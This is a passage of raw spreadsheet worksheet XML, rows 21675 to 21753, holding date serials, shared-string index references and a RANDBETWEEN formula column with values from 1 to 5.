        <v>5</v>
      </c>
    </row>
    <row r="21675" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21675" s="1">
        <v>43069.928113425929</v>
      </c>
      <c r="C21675" t="s">
        <v>139</v>
      </c>
      <c r="E21675" s="2" t="s">
        <v>19546</v>
      </c>
      <c r="F21675">
        <f t="shared" ca="1" si="338"/>
        <v>5</v>
      </c>
    </row>
    <row r="21676" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21676" s="1">
        <v>43069.791354166664</v>
      </c>
      <c r="C21676" t="s">
        <v>6</v>
      </c>
      <c r="D21676" t="s">
        <v>114</v>
      </c>
      <c r="E21676" t="s">
        <v>19547</v>
      </c>
      <c r="F21676">
        <f t="shared" ca="1" si="338"/>
        <v>4</v>
      </c>
    </row>
    <row r="21677" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21677" s="1">
        <v>43069.783773148149</v>
      </c>
      <c r="C21677" t="s">
        <v>13307</v>
      </c>
      <c r="D21677" t="s">
        <v>56</v>
      </c>
      <c r="E21677" s="2" t="s">
        <v>19548</v>
      </c>
      <c r="F21677">
        <f t="shared" ca="1" si="338"/>
        <v>4</v>
      </c>
    </row>
    <row r="21678" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21678" s="1">
        <v>43069.734675925924</v>
      </c>
      <c r="C21678" t="s">
        <v>10</v>
      </c>
      <c r="D21678" t="s">
        <v>6</v>
      </c>
      <c r="E21678" s="2" t="s">
        <v>19549</v>
      </c>
      <c r="F21678">
        <f t="shared" ca="1" si="338"/>
        <v>2</v>
      </c>
    </row>
    <row r="21679" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21679" s="1">
        <v>43069.732719907406</v>
      </c>
      <c r="C21679" t="s">
        <v>10</v>
      </c>
      <c r="D21679" t="s">
        <v>271</v>
      </c>
      <c r="E21679" s="2" t="s">
        <v>19550</v>
      </c>
      <c r="F21679">
        <f t="shared" ca="1" si="338"/>
        <v>3</v>
      </c>
    </row>
    <row r="21680" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21680" s="1">
        <v>43069.705370370371</v>
      </c>
      <c r="C21680" t="s">
        <v>10</v>
      </c>
      <c r="D21680" t="s">
        <v>244</v>
      </c>
      <c r="F21680">
        <f t="shared" ca="1" si="338"/>
        <v>4</v>
      </c>
    </row>
    <row r="21681" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21681" s="1">
        <v>43069.670416666668</v>
      </c>
      <c r="C21681" t="s">
        <v>10</v>
      </c>
      <c r="D21681" t="s">
        <v>222</v>
      </c>
      <c r="E21681" t="s">
        <v>19551</v>
      </c>
      <c r="F21681">
        <f t="shared" ca="1" si="338"/>
        <v>4</v>
      </c>
    </row>
    <row r="21682" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21682" s="1">
        <v>43069.571886574071</v>
      </c>
      <c r="C21682" t="s">
        <v>10</v>
      </c>
      <c r="D21682" t="s">
        <v>6</v>
      </c>
      <c r="E21682" t="s">
        <v>19552</v>
      </c>
      <c r="F21682">
        <f t="shared" ca="1" si="338"/>
        <v>4</v>
      </c>
    </row>
    <row r="21683" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21683" s="1">
        <v>43069.568645833337</v>
      </c>
      <c r="C21683" t="s">
        <v>10</v>
      </c>
      <c r="D21683" t="s">
        <v>20</v>
      </c>
      <c r="E21683" s="2" t="s">
        <v>19553</v>
      </c>
      <c r="F21683">
        <f t="shared" ca="1" si="338"/>
        <v>1</v>
      </c>
    </row>
    <row r="21684" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21684" s="1">
        <v>43069.562777777777</v>
      </c>
      <c r="C21684" t="s">
        <v>10</v>
      </c>
      <c r="D21684" t="s">
        <v>6</v>
      </c>
      <c r="E21684" s="2" t="s">
        <v>19554</v>
      </c>
      <c r="F21684">
        <f t="shared" ca="1" si="338"/>
        <v>4</v>
      </c>
    </row>
    <row r="21685" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21685" s="1">
        <v>43069.553368055553</v>
      </c>
      <c r="C21685" t="s">
        <v>10</v>
      </c>
      <c r="D21685" t="s">
        <v>86</v>
      </c>
      <c r="E21685" s="2" t="s">
        <v>19555</v>
      </c>
      <c r="F21685">
        <f t="shared" ca="1" si="338"/>
        <v>2</v>
      </c>
    </row>
    <row r="21686" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21686" s="1">
        <v>43069.528773148151</v>
      </c>
      <c r="C21686" t="s">
        <v>10</v>
      </c>
      <c r="D21686" t="s">
        <v>271</v>
      </c>
      <c r="E21686" t="s">
        <v>19556</v>
      </c>
      <c r="F21686">
        <f t="shared" ca="1" si="338"/>
        <v>2</v>
      </c>
    </row>
    <row r="21687" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21687" s="1">
        <v>43069.518796296295</v>
      </c>
      <c r="C21687" t="s">
        <v>43</v>
      </c>
      <c r="E21687" s="2" t="s">
        <v>19557</v>
      </c>
      <c r="F21687">
        <f t="shared" ca="1" si="338"/>
        <v>1</v>
      </c>
    </row>
    <row r="21688" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21688" s="1">
        <v>43069.484351851854</v>
      </c>
      <c r="C21688" t="s">
        <v>10</v>
      </c>
      <c r="D21688" t="s">
        <v>17</v>
      </c>
      <c r="E21688" t="s">
        <v>19558</v>
      </c>
      <c r="F21688">
        <f t="shared" ca="1" si="338"/>
        <v>1</v>
      </c>
    </row>
    <row r="21689" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A21689" s="1">
        <v>43069.476782407408</v>
      </c>
      <c r="C21689" t="s">
        <v>65</v>
      </c>
      <c r="E21689" s="2" t="s">
        <v>19559</v>
      </c>
      <c r="F21689">
        <f t="shared" ca="1" si="338"/>
        <v>3</v>
      </c>
    </row>
    <row r="21690" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21690" s="1">
        <v>43069.447951388887</v>
      </c>
      <c r="C21690" t="s">
        <v>10</v>
      </c>
      <c r="D21690" t="s">
        <v>330</v>
      </c>
      <c r="E21690" t="s">
        <v>19560</v>
      </c>
      <c r="F21690">
        <f t="shared" ca="1" si="338"/>
        <v>4</v>
      </c>
    </row>
    <row r="21691" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21691" s="1">
        <v>43069.425370370373</v>
      </c>
      <c r="C21691" t="s">
        <v>6</v>
      </c>
      <c r="D21691" t="s">
        <v>25</v>
      </c>
      <c r="E21691" t="s">
        <v>19561</v>
      </c>
      <c r="F21691">
        <f t="shared" ca="1" si="338"/>
        <v>2</v>
      </c>
    </row>
    <row r="21692" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21692" s="1">
        <v>43069.421840277777</v>
      </c>
      <c r="C21692" t="s">
        <v>229</v>
      </c>
      <c r="E21692" t="s">
        <v>19562</v>
      </c>
      <c r="F21692">
        <f t="shared" ca="1" si="338"/>
        <v>3</v>
      </c>
    </row>
    <row r="21693" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21693" s="1">
        <v>43069.412210648145</v>
      </c>
      <c r="C21693" t="s">
        <v>41</v>
      </c>
      <c r="E21693" t="s">
        <v>5235</v>
      </c>
      <c r="F21693">
        <f t="shared" ca="1" si="338"/>
        <v>2</v>
      </c>
    </row>
    <row r="21694" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21694" s="1">
        <v>43069.410555555558</v>
      </c>
      <c r="C21694" t="s">
        <v>10</v>
      </c>
      <c r="E21694" t="s">
        <v>19563</v>
      </c>
      <c r="F21694">
        <f t="shared" ca="1" si="338"/>
        <v>4</v>
      </c>
    </row>
    <row r="21695" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21695" s="1">
        <v>43069.404247685183</v>
      </c>
      <c r="C21695" t="s">
        <v>60</v>
      </c>
      <c r="E21695" s="2" t="s">
        <v>19564</v>
      </c>
      <c r="F21695">
        <f t="shared" ca="1" si="338"/>
        <v>1</v>
      </c>
    </row>
    <row r="21696" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21696" s="1">
        <v>43069.361631944441</v>
      </c>
      <c r="C21696" t="s">
        <v>63</v>
      </c>
      <c r="E21696" t="s">
        <v>19565</v>
      </c>
      <c r="F21696">
        <f t="shared" ca="1" si="338"/>
        <v>2</v>
      </c>
    </row>
    <row r="21697" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21697" s="1">
        <v>43069.349351851852</v>
      </c>
      <c r="C21697" t="s">
        <v>10</v>
      </c>
      <c r="D21697" t="s">
        <v>23</v>
      </c>
      <c r="E21697" t="s">
        <v>19566</v>
      </c>
      <c r="F21697">
        <f t="shared" ca="1" si="338"/>
        <v>5</v>
      </c>
    </row>
    <row r="21698" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A21698" s="1">
        <v>43069.327835648146</v>
      </c>
      <c r="C21698" t="s">
        <v>50</v>
      </c>
      <c r="E21698" s="2" t="s">
        <v>19567</v>
      </c>
      <c r="F21698">
        <f t="shared" ref="F21698:F21761" ca="1" si="339">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="21699" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21699" s="1">
        <v>43069.32167824074</v>
      </c>
      <c r="C21699" t="s">
        <v>71</v>
      </c>
      <c r="E21699" t="s">
        <v>19568</v>
      </c>
      <c r="F21699">
        <f t="shared" ca="1" si="339"/>
        <v>4</v>
      </c>
    </row>
    <row r="21700" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21700" s="1">
        <v>43069.316689814812</v>
      </c>
      <c r="C21700" t="s">
        <v>48</v>
      </c>
      <c r="E21700" s="2" t="s">
        <v>19569</v>
      </c>
      <c r="F21700">
        <f t="shared" ca="1" si="339"/>
        <v>3</v>
      </c>
    </row>
    <row r="21701" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21701" s="1">
        <v>43069.314189814817</v>
      </c>
      <c r="C21701" t="s">
        <v>48</v>
      </c>
      <c r="E21701" s="2" t="s">
        <v>19570</v>
      </c>
      <c r="F21701">
        <f t="shared" ca="1" si="339"/>
        <v>3</v>
      </c>
    </row>
    <row r="21702" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21702" s="1">
        <v>43069.303159722222</v>
      </c>
      <c r="C21702" t="s">
        <v>48</v>
      </c>
      <c r="E21702" s="2" t="s">
        <v>19571</v>
      </c>
      <c r="F21702">
        <f t="shared" ca="1" si="339"/>
        <v>5</v>
      </c>
    </row>
    <row r="21703" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21703" s="1">
        <v>43069.295590277776</v>
      </c>
      <c r="C21703" t="s">
        <v>71</v>
      </c>
      <c r="E21703" s="2" t="s">
        <v>19572</v>
      </c>
      <c r="F21703">
        <f t="shared" ca="1" si="339"/>
        <v>5</v>
      </c>
    </row>
    <row r="21704" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21704" s="1">
        <v>43069.259699074071</v>
      </c>
      <c r="C21704" t="s">
        <v>41</v>
      </c>
      <c r="E21704" t="s">
        <v>19573</v>
      </c>
      <c r="F21704">
        <f t="shared" ca="1" si="339"/>
        <v>3</v>
      </c>
    </row>
    <row r="21705" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21705" s="1">
        <v>43069.257974537039</v>
      </c>
      <c r="C21705" t="s">
        <v>41</v>
      </c>
      <c r="F21705">
        <f t="shared" ca="1" si="339"/>
        <v>4</v>
      </c>
    </row>
    <row r="21706" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21706" s="1">
        <v>43069.23678240741</v>
      </c>
      <c r="C21706" t="s">
        <v>559</v>
      </c>
      <c r="E21706" s="2" t="s">
        <v>19574</v>
      </c>
      <c r="F21706">
        <f t="shared" ca="1" si="339"/>
        <v>5</v>
      </c>
    </row>
    <row r="21707" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A21707" s="1">
        <v>43069.184999999998</v>
      </c>
      <c r="C21707" t="s">
        <v>41</v>
      </c>
      <c r="E21707" s="2" t="s">
        <v>19575</v>
      </c>
      <c r="F21707">
        <f t="shared" ca="1" si="339"/>
        <v>5</v>
      </c>
    </row>
    <row r="21708" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21708" s="1">
        <v>43069.018576388888</v>
      </c>
      <c r="C21708" t="s">
        <v>41</v>
      </c>
      <c r="E21708" s="2" t="s">
        <v>19576</v>
      </c>
      <c r="F21708">
        <f t="shared" ca="1" si="339"/>
        <v>5</v>
      </c>
    </row>
    <row r="21709" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21709" s="1">
        <v>43068.928449074076</v>
      </c>
      <c r="C21709" t="s">
        <v>139</v>
      </c>
      <c r="E21709" t="s">
        <v>19577</v>
      </c>
      <c r="F21709">
        <f t="shared" ca="1" si="339"/>
        <v>1</v>
      </c>
    </row>
    <row r="21710" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A21710" s="1">
        <v>43068.889918981484</v>
      </c>
      <c r="C21710" t="s">
        <v>140</v>
      </c>
      <c r="D21710" t="s">
        <v>141</v>
      </c>
      <c r="E21710" s="2" t="s">
        <v>19578</v>
      </c>
      <c r="F21710">
        <f t="shared" ca="1" si="339"/>
        <v>5</v>
      </c>
    </row>
    <row r="21711" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A21711" s="1">
        <v>43068.889282407406</v>
      </c>
      <c r="C21711" t="s">
        <v>314</v>
      </c>
      <c r="E21711" s="2" t="s">
        <v>19578</v>
      </c>
      <c r="F21711">
        <f t="shared" ca="1" si="339"/>
        <v>2</v>
      </c>
    </row>
    <row r="21712" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21712" s="1">
        <v>43068.807858796295</v>
      </c>
      <c r="C21712" t="s">
        <v>4278</v>
      </c>
      <c r="D21712" t="s">
        <v>885</v>
      </c>
      <c r="E21712" s="2" t="s">
        <v>19579</v>
      </c>
      <c r="F21712">
        <f t="shared" ca="1" si="339"/>
        <v>3</v>
      </c>
    </row>
    <row r="21713" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21713" s="1">
        <v>43068.805590277778</v>
      </c>
      <c r="C21713" t="s">
        <v>140</v>
      </c>
      <c r="D21713" t="s">
        <v>141</v>
      </c>
      <c r="E21713" s="2" t="s">
        <v>19580</v>
      </c>
      <c r="F21713">
        <f t="shared" ca="1" si="339"/>
        <v>2</v>
      </c>
    </row>
    <row r="21714" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21714" s="1">
        <v>43068.795567129629</v>
      </c>
      <c r="C21714" t="s">
        <v>10</v>
      </c>
      <c r="D21714" t="s">
        <v>290</v>
      </c>
      <c r="E21714" t="s">
        <v>19581</v>
      </c>
      <c r="F21714">
        <f t="shared" ca="1" si="339"/>
        <v>3</v>
      </c>
    </row>
    <row r="21715" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21715" s="1">
        <v>43068.758009259262</v>
      </c>
      <c r="C21715" t="s">
        <v>6</v>
      </c>
      <c r="D21715" t="s">
        <v>114</v>
      </c>
      <c r="E21715" t="s">
        <v>19582</v>
      </c>
      <c r="F21715">
        <f t="shared" ca="1" si="339"/>
        <v>3</v>
      </c>
    </row>
    <row r="21716" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21716" s="1">
        <v>43068.75199074074</v>
      </c>
      <c r="C21716" t="s">
        <v>10</v>
      </c>
      <c r="D21716" t="s">
        <v>6</v>
      </c>
      <c r="E21716" t="s">
        <v>19583</v>
      </c>
      <c r="F21716">
        <f t="shared" ca="1" si="339"/>
        <v>1</v>
      </c>
    </row>
    <row r="21717" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21717" s="1">
        <v>43068.703472222223</v>
      </c>
      <c r="C21717" t="s">
        <v>10</v>
      </c>
      <c r="D21717" t="s">
        <v>89</v>
      </c>
      <c r="E21717" t="s">
        <v>19584</v>
      </c>
      <c r="F21717">
        <f t="shared" ca="1" si="339"/>
        <v>3</v>
      </c>
    </row>
    <row r="21718" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21718" s="1">
        <v>43068.688715277778</v>
      </c>
      <c r="C21718" t="s">
        <v>10</v>
      </c>
      <c r="D21718" t="s">
        <v>46</v>
      </c>
      <c r="E21718" s="2" t="s">
        <v>19585</v>
      </c>
      <c r="F21718">
        <f t="shared" ca="1" si="339"/>
        <v>2</v>
      </c>
    </row>
    <row r="21719" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21719" s="1">
        <v>43068.671793981484</v>
      </c>
      <c r="C21719" t="s">
        <v>10</v>
      </c>
      <c r="D21719" t="s">
        <v>112</v>
      </c>
      <c r="E21719" t="s">
        <v>19586</v>
      </c>
      <c r="F21719">
        <f t="shared" ca="1" si="339"/>
        <v>5</v>
      </c>
    </row>
    <row r="21720" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A21720" s="1">
        <v>43068.670266203706</v>
      </c>
      <c r="C21720" t="s">
        <v>48</v>
      </c>
      <c r="E21720" s="2" t="s">
        <v>19587</v>
      </c>
      <c r="F21720">
        <f t="shared" ca="1" si="339"/>
        <v>5</v>
      </c>
    </row>
    <row r="21721" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21721" s="1">
        <v>43068.650277777779</v>
      </c>
      <c r="C21721" t="s">
        <v>10</v>
      </c>
      <c r="D21721" t="s">
        <v>163</v>
      </c>
      <c r="E21721" t="s">
        <v>19588</v>
      </c>
      <c r="F21721">
        <f t="shared" ca="1" si="339"/>
        <v>5</v>
      </c>
    </row>
    <row r="21722" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21722" s="1">
        <v>43068.63354166667</v>
      </c>
      <c r="C21722" t="s">
        <v>10</v>
      </c>
      <c r="D21722" t="s">
        <v>36</v>
      </c>
      <c r="E21722" t="s">
        <v>19589</v>
      </c>
      <c r="F21722">
        <f t="shared" ca="1" si="339"/>
        <v>5</v>
      </c>
    </row>
    <row r="21723" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21723" s="1">
        <v>43068.62190972222</v>
      </c>
      <c r="C21723" t="s">
        <v>10</v>
      </c>
      <c r="D21723" t="s">
        <v>52</v>
      </c>
      <c r="E21723" t="s">
        <v>19590</v>
      </c>
      <c r="F21723">
        <f t="shared" ca="1" si="339"/>
        <v>3</v>
      </c>
    </row>
    <row r="21724" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21724" s="1">
        <v>43068.586678240739</v>
      </c>
      <c r="C21724" t="s">
        <v>318</v>
      </c>
      <c r="E21724" t="s">
        <v>19591</v>
      </c>
      <c r="F21724">
        <f t="shared" ca="1" si="339"/>
        <v>2</v>
      </c>
    </row>
    <row r="21725" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21725" s="1">
        <v>43068.561249999999</v>
      </c>
      <c r="C21725" t="s">
        <v>43</v>
      </c>
      <c r="E21725" t="s">
        <v>19592</v>
      </c>
      <c r="F21725">
        <f t="shared" ca="1" si="339"/>
        <v>5</v>
      </c>
    </row>
    <row r="21726" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21726" s="1">
        <v>43068.559224537035</v>
      </c>
      <c r="C21726" t="s">
        <v>10</v>
      </c>
      <c r="D21726" t="s">
        <v>52</v>
      </c>
      <c r="E21726" t="s">
        <v>19593</v>
      </c>
      <c r="F21726">
        <f t="shared" ca="1" si="339"/>
        <v>3</v>
      </c>
    </row>
    <row r="21727" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21727" s="1">
        <v>43068.55841435185</v>
      </c>
      <c r="C21727" t="s">
        <v>10</v>
      </c>
      <c r="D21727" t="s">
        <v>112</v>
      </c>
      <c r="E21727" s="2" t="s">
        <v>19594</v>
      </c>
      <c r="F21727">
        <f t="shared" ca="1" si="339"/>
        <v>3</v>
      </c>
    </row>
    <row r="21728" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21728" s="1">
        <v>43068.544178240743</v>
      </c>
      <c r="C21728" t="s">
        <v>10</v>
      </c>
      <c r="D21728" t="s">
        <v>46</v>
      </c>
      <c r="E21728" t="s">
        <v>19595</v>
      </c>
      <c r="F21728">
        <f t="shared" ca="1" si="339"/>
        <v>1</v>
      </c>
    </row>
    <row r="21729" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A21729" s="1">
        <v>43068.509039351855</v>
      </c>
      <c r="C21729" t="s">
        <v>10</v>
      </c>
      <c r="D21729" t="s">
        <v>6</v>
      </c>
      <c r="E21729" s="2" t="s">
        <v>19596</v>
      </c>
      <c r="F21729">
        <f t="shared" ca="1" si="339"/>
        <v>4</v>
      </c>
    </row>
    <row r="21730" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21730" s="1">
        <v>43068.506655092591</v>
      </c>
      <c r="C21730" t="s">
        <v>10</v>
      </c>
      <c r="D21730" t="s">
        <v>36</v>
      </c>
      <c r="E21730" t="s">
        <v>19597</v>
      </c>
      <c r="F21730">
        <f t="shared" ca="1" si="339"/>
        <v>2</v>
      </c>
    </row>
    <row r="21731" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21731" s="1">
        <v>43068.504803240743</v>
      </c>
      <c r="C21731" t="s">
        <v>10</v>
      </c>
      <c r="D21731" t="s">
        <v>52</v>
      </c>
      <c r="E21731" t="s">
        <v>19598</v>
      </c>
      <c r="F21731">
        <f t="shared" ca="1" si="339"/>
        <v>4</v>
      </c>
    </row>
    <row r="21732" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21732" s="1">
        <v>43068.501689814817</v>
      </c>
      <c r="C21732" t="s">
        <v>10</v>
      </c>
      <c r="D21732" t="s">
        <v>89</v>
      </c>
      <c r="E21732" t="s">
        <v>19599</v>
      </c>
      <c r="F21732">
        <f t="shared" ca="1" si="339"/>
        <v>4</v>
      </c>
    </row>
    <row r="21733" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21733" s="1">
        <v>43068.500428240739</v>
      </c>
      <c r="C21733" t="s">
        <v>10</v>
      </c>
      <c r="D21733" t="s">
        <v>89</v>
      </c>
      <c r="E21733" t="s">
        <v>19600</v>
      </c>
      <c r="F21733">
        <f t="shared" ca="1" si="339"/>
        <v>1</v>
      </c>
    </row>
    <row r="21734" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21734" s="1">
        <v>43068.46130787037</v>
      </c>
      <c r="C21734" t="s">
        <v>48</v>
      </c>
      <c r="E21734" s="2" t="s">
        <v>19601</v>
      </c>
      <c r="F21734">
        <f t="shared" ca="1" si="339"/>
        <v>2</v>
      </c>
    </row>
    <row r="21735" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21735" s="1">
        <v>43068.45815972222</v>
      </c>
      <c r="C21735" t="s">
        <v>10</v>
      </c>
      <c r="D21735" t="s">
        <v>151</v>
      </c>
      <c r="E21735" t="s">
        <v>19602</v>
      </c>
      <c r="F21735">
        <f t="shared" ca="1" si="339"/>
        <v>5</v>
      </c>
    </row>
    <row r="21736" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21736" s="1">
        <v>43068.43540509259</v>
      </c>
      <c r="C21736" t="s">
        <v>71</v>
      </c>
      <c r="E21736" s="2" t="s">
        <v>19603</v>
      </c>
      <c r="F21736">
        <f t="shared" ca="1" si="339"/>
        <v>1</v>
      </c>
    </row>
    <row r="21737" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21737" s="1">
        <v>43068.406226851854</v>
      </c>
      <c r="C21737" t="s">
        <v>10</v>
      </c>
      <c r="D21737" t="s">
        <v>192</v>
      </c>
      <c r="E21737" t="s">
        <v>19604</v>
      </c>
      <c r="F21737">
        <f t="shared" ca="1" si="339"/>
        <v>4</v>
      </c>
    </row>
    <row r="21738" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21738" s="1">
        <v>43068.36928240741</v>
      </c>
      <c r="C21738" t="s">
        <v>10</v>
      </c>
      <c r="D21738" t="s">
        <v>290</v>
      </c>
      <c r="E21738" t="s">
        <v>19605</v>
      </c>
      <c r="F21738">
        <f t="shared" ca="1" si="339"/>
        <v>2</v>
      </c>
    </row>
    <row r="21739" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21739" s="1">
        <v>43068.351666666669</v>
      </c>
      <c r="C21739" t="s">
        <v>65</v>
      </c>
      <c r="E21739" s="2" t="s">
        <v>19606</v>
      </c>
      <c r="F21739">
        <f t="shared" ca="1" si="339"/>
        <v>4</v>
      </c>
    </row>
    <row r="21740" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A21740" s="1">
        <v>43068.347928240742</v>
      </c>
      <c r="C21740" t="s">
        <v>10</v>
      </c>
      <c r="D21740" t="s">
        <v>52</v>
      </c>
      <c r="E21740" s="2" t="s">
        <v>19607</v>
      </c>
      <c r="F21740">
        <f t="shared" ca="1" si="339"/>
        <v>2</v>
      </c>
    </row>
    <row r="21741" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21741" s="1">
        <v>43068.339942129627</v>
      </c>
      <c r="C21741" t="s">
        <v>10</v>
      </c>
      <c r="D21741" t="s">
        <v>36</v>
      </c>
      <c r="E21741" t="s">
        <v>19608</v>
      </c>
      <c r="F21741">
        <f t="shared" ca="1" si="339"/>
        <v>3</v>
      </c>
    </row>
    <row r="21742" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21742" s="1">
        <v>43068.33116898148</v>
      </c>
      <c r="C21742" t="s">
        <v>10</v>
      </c>
      <c r="D21742" t="s">
        <v>14</v>
      </c>
      <c r="E21742" t="s">
        <v>19609</v>
      </c>
      <c r="F21742">
        <f t="shared" ca="1" si="339"/>
        <v>3</v>
      </c>
    </row>
    <row r="21743" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21743" s="1">
        <v>43068.330231481479</v>
      </c>
      <c r="C21743" t="s">
        <v>48</v>
      </c>
      <c r="E21743" s="2" t="s">
        <v>19610</v>
      </c>
      <c r="F21743">
        <f t="shared" ca="1" si="339"/>
        <v>2</v>
      </c>
    </row>
    <row r="21744" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21744" s="1">
        <v>43068.280694444446</v>
      </c>
      <c r="C21744" t="s">
        <v>71</v>
      </c>
      <c r="E21744" s="2" t="s">
        <v>19611</v>
      </c>
      <c r="F21744">
        <f t="shared" ca="1" si="339"/>
        <v>2</v>
      </c>
    </row>
    <row r="21745" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21745" s="1">
        <v>43068.27375</v>
      </c>
      <c r="C21745" t="s">
        <v>6</v>
      </c>
      <c r="D21745" t="s">
        <v>194</v>
      </c>
      <c r="E21745" t="s">
        <v>19612</v>
      </c>
      <c r="F21745">
        <f t="shared" ca="1" si="339"/>
        <v>5</v>
      </c>
    </row>
    <row r="21746" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21746" s="1">
        <v>43068.26226851852</v>
      </c>
      <c r="C21746" t="s">
        <v>63</v>
      </c>
      <c r="E21746" s="2" t="s">
        <v>19613</v>
      </c>
      <c r="F21746">
        <f t="shared" ca="1" si="339"/>
        <v>3</v>
      </c>
    </row>
    <row r="21747" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A21747" s="1">
        <v>43068.246342592596</v>
      </c>
      <c r="C21747" t="s">
        <v>10</v>
      </c>
      <c r="D21747" t="s">
        <v>36</v>
      </c>
      <c r="E21747" s="2" t="s">
        <v>19614</v>
      </c>
      <c r="F21747">
        <f t="shared" ca="1" si="339"/>
        <v>4</v>
      </c>
    </row>
    <row r="21748" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A21748" s="1">
        <v>43068.220925925925</v>
      </c>
      <c r="C21748" t="s">
        <v>48</v>
      </c>
      <c r="E21748" s="2" t="s">
        <v>19615</v>
      </c>
      <c r="F21748">
        <f t="shared" ca="1" si="339"/>
        <v>4</v>
      </c>
    </row>
    <row r="21749" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21749" s="1">
        <v>43068.206805555557</v>
      </c>
      <c r="C21749" t="s">
        <v>134</v>
      </c>
      <c r="E21749" t="s">
        <v>19616</v>
      </c>
      <c r="F21749">
        <f t="shared" ca="1" si="339"/>
        <v>1</v>
      </c>
    </row>
    <row r="21750" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21750" s="1">
        <v>43068.203356481485</v>
      </c>
      <c r="C21750" t="s">
        <v>173</v>
      </c>
      <c r="E21750" s="2" t="s">
        <v>19617</v>
      </c>
      <c r="F21750">
        <f t="shared" ca="1" si="339"/>
        <v>4</v>
      </c>
    </row>
    <row r="21751" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21751" s="1">
        <v>43068.196863425925</v>
      </c>
      <c r="C21751" t="s">
        <v>73</v>
      </c>
      <c r="E21751" t="s">
        <v>19618</v>
      </c>
      <c r="F21751">
        <f t="shared" ca="1" si="339"/>
        <v>1</v>
      </c>
    </row>
    <row r="21752" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21752" s="1">
        <v>43068.178900462961</v>
      </c>
      <c r="C21752" t="s">
        <v>17</v>
      </c>
      <c r="F21752">
        <f t="shared" ca="1" si="339"/>
        <v>1</v>
      </c>
    </row>
    <row r="21753" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21753" s="1">
        <v>43068.143553240741</v>
      </c>
      <c r="C21753" t="s">
        <v>173</v>
      </c>
      <c r="E21753" s="2" t="s">
        <v>19617</v>
      </c>
      <c r="F21753">
        <f t="shared" ca="1" si="339"/>
        <v>2</v>
